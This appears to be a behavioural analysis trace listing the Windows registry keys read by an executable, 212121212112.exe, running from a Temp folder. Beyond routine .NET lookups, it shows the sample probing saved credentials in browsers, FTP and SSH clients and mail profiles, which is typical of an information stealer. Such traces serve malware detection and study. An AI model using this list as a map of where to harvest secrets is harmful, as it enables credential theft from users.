HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\212121212112.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\18bda23d\56925b9d
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index36
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\9de3753\60cdefb
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|212121212112.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|212121212112.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|212121212112.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\9de3753\12c5f37f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Macromedia
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
